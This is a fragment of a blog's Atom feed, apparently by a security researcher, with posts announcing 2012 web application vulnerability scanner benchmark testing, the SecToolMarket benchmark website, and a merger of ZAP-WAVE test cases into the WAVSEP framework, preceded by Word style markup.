  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 1 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Shading 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 1 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium List 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 1 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Medium Grid 3 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Dark List Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Shading Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful List Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Colorful Grid Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;19&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Subtle Emphasis&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;21&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Intense Emphasis&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;31&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Subtle Reference&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;32&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Intense Reference&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;33&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Book Title&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;37&quot; Name=&quot;Bibliography&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; QFormat=&quot;true&quot; Name=&quot;TOC Heading&quot;/&gt;
 &lt;/w:LatentStyles&gt;
&lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt;
&lt;style&gt;
 /* Style Definitions */
 table.MsoNormalTable
 {mso-style-name:&quot;Table Normal&quot;;
 mso-tstyle-rowband-size:0;
 mso-tstyle-colband-size:0;
 mso-style-noshow:yes;
 mso-style-priority:99;
 mso-style-qformat:yes;
 mso-style-parent:&quot;&quot;;
 mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
 mso-para-margin-top:0cm;
 mso-para-margin-right:0cm;
 mso-para-margin-bottom:10.0pt;
 mso-para-margin-left:0cm;
 line-height:115%;
 mso-pagination:widow-orphan;
 font-size:11.0pt;
 font-family:&quot;Calibri&quot;,&quot;sans-serif&quot;;
 mso-ascii-font-family:Calibri;
 mso-ascii-theme-font:minor-latin;
 mso-fareast-font-family:&quot;Times New Roman&quot;;
 mso-fareast-theme-font:minor-fareast;
 mso-hansi-font-family:Calibri;
 mso-hansi-theme-font:minor-latin;
 mso-bidi-font-family:Arial;
 mso-bidi-theme-font:minor-bidi;}
&lt;/style&gt;
&lt;![endif]--&gt;

&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Well, it took me some time to finish the new version of the assessment platform,
but now I&#39;m all set and ready to go.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
I&#39;ve just started testing Web Application Vulnerability Scanners for the
&lt;u&gt;&lt;b&gt;2012&lt;/b&gt;&lt;/u&gt; scanner comparison. The benchmark will cover freeware, open-source and
commercial web application scanners, including newly published tools, many
tools that were not assessed in the last benchmark, and even tools that usually
fall under different categories.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
The test will enable any previously assessed product a chance to improve
its previous score (all the previous wavsep test-cases will be included in each product assessment), and also allow tools to excel in &lt;b&gt;new&lt;/b&gt; categories.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Want to improve your previous score, get your product in the list, or
even conquer the top?&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Now&#39;s a good time to notify me about your product, and provide me with a
license.&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/8826741740120665116/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2012/05/started-testing-scanners-for-2012.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/8826741740120665116'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/8826741740120665116'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2012/05/started-testing-scanners-for-2012.html' title='Started Testing Scanners for the 2012 Benchmark!'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-1903743518632931738</id><published>2012-02-19T17:36:00.000-08:00</published><updated>2012-05-11T05:58:23.856-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="benchmark"/><category scheme="http://www.blogger.com/atom/ns#" term="sectoolmarket"/><category scheme="http://www.blogger.com/atom/ns#" term="web application scanner"/><title type='text'>SecToolMarket - A dynamic benchmark presentation website</title><content type='html'>&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Although I can&#39;t really claim that what I&#39;m about to present is perfect (I&#39;m learning to control that one, hopefully), and the design is not &lt;b&gt;yet&lt;/b&gt; memorable (U-N-D-E-R-S-T-A-T-E-M-E-N-T), it&#39;s &lt;b&gt;certainly going to be useful for a lot of folks&lt;/b&gt; - pen-testers (first and foremost), vendors, analysts, researchers, security personal, and a bunch of people that stumbled upon this blog and are about to face a lot of scary words.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
In short, the benchmark presentation framework is up and ready, and published as a web site called &lt;b&gt;SecToolMarket&lt;/b&gt; (&lt;a href=&quot;http://www.sectoolmarket.com/&quot;&gt;http://www.sectoolmarket.com&lt;/a&gt;).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
I originally planned hosting it in Google sites (which is why there&#39;s no JS/AJAX/etc), but after a couple of hours of desperately trying to upload &amp;nbsp;bulks of files to Google sites, I gave up and used the conventional method.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Although it doesn&#39;t yet contain a lot of new information (mostly additional information &amp;amp; analysis of the products tested in &lt;b&gt;2011&lt;/b&gt;), it&#39;s much easier to navigate through the data, and the analysis of the 2011 benchmark can provide additional insights, even to those that read the 2011 benchmark post.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
A part from adding statistics, making things simpler, adding glossaries for everything and collecting vendor and product specific stats under dedicated pages, this framework can also be updated more frequently (and hopefully on a consistent basis), contains information that wasn&#39;t published, and allows you to track my progress as I&#39;m performing my comparisons.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
The two new categories (input-vector-support and coverage) are still &lt;b&gt;&lt;u&gt;incomplete&lt;/u&gt;&lt;/b&gt; (and will probably be updated soon, especially for commercial scanners - which will hopefully notify me if there&#39;s any missing information), but they already provide some insights, that might be relevant for some us.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Some screen captures of the content:&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju8074qYo9ztnkPUOEGhlL9EbIKrRpJctNfZ-tg_N2EcdWRtdprtRvcsPQWAvALuktSp0YMFkytKVcFCsmFW-y4dFoEs3HNUJt0jK4_NxApG8MZbVInsOv2iv6xLHBPebx8y7S-hhpe0I/s1600/sectoolmarket-main.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;190&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju8074qYo9ztnkPUOEGhlL9EbIKrRpJctNfZ-tg_N2EcdWRtdprtRvcsPQWAvALuktSp0YMFkytKVcFCsmFW-y4dFoEs3HNUJt0jK4_NxApG8MZbVInsOv2iv6xLHBPebx8y7S-hhpe0I/s320/sectoolmarket-main.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNoPAcmIHuvvgdsSr5u9gk_SN4yuihKE2I8vvvmHVzaSAypKuDO6CyX9DTl_K-z16i1zwzi-DefBikDiRDuaunACgwtNFcmhQcX5eJ2nxEo4YE_ekYliGrM4On5Vz6UwZgTg0OW88aN_M/s1600/sectoolmarket-audit.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;190&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNoPAcmIHuvvgdsSr5u9gk_SN4yuihKE2I8vvvmHVzaSAypKuDO6CyX9DTl_K-z16i1zwzi-DefBikDiRDuaunACgwtNFcmhQcX5eJ2nxEo4YE_ekYliGrM4On5Vz6UwZgTg0OW88aN_M/s320/sectoolmarket-audit.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
I&#39;ll probably post additional information on this website, and my future plans, but in the meantime, I&#39;m going to crash, and hope you have fun with it.&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/1903743518632931738/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2012/02/sectoolmarket-dynamic-benchmark.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/1903743518632931738'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/1903743518632931738'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2012/02/sectoolmarket-dynamic-benchmark.html' title='SecToolMarket - A dynamic benchmark presentation website'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju8074qYo9ztnkPUOEGhlL9EbIKrRpJctNfZ-tg_N2EcdWRtdprtRvcsPQWAvALuktSp0YMFkytKVcFCsmFW-y4dFoEs3HNUJt0jK4_NxApG8MZbVInsOv2iv6xLHBPebx8y7S-hhpe0I/s72-c/sectoolmarket-main.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-1447893863240812862</id><published>2011-10-23T15:46:00.000-07:00</published><updated>2011-10-23T15:50:17.451-07:00</updated><title type='text'>Rules of the Game – Scanner Benchmarks</title><content type='html'>The last couple of months have been very interesting (thanks for all the great feedback and constructive criticism), and I have some good news and several announcements.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;u&gt;First, the good news: &lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;I had several discussions with &lt;b&gt;Simon Bennetts&lt;/b&gt; (psiinon), one of the chapter leaders in OWASP and the leader / co-leader of several OWASP projects (ZAP, WAVE and OWASP-DEF). &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;One of the sub projects Simon is leading is ZAP-WAVE, the &lt;b&gt;only &lt;/b&gt;additional web-app scanner evaluation framework which is actively maintained (the last publically available update of the third framework – &quot;&lt;b&gt;moth&lt;/b&gt;&quot;, was in mid 2009), and he suggested we &lt;b&gt;merge &lt;/b&gt;our efforts so that everyone will benefit.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;To make a long story short, Simon contributed the source code of the current test cases of ZAP-WAVE, allowing me adjust them into WAVSEP format and publish them under GPL 3.0 (currently available under ASF 2.0, lawyer comments aside). He even suggested that in the future, test cases that will be implemented by the ZAP team will be in WAVSEP format (structure and documentation). &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;&lt;br /&gt;
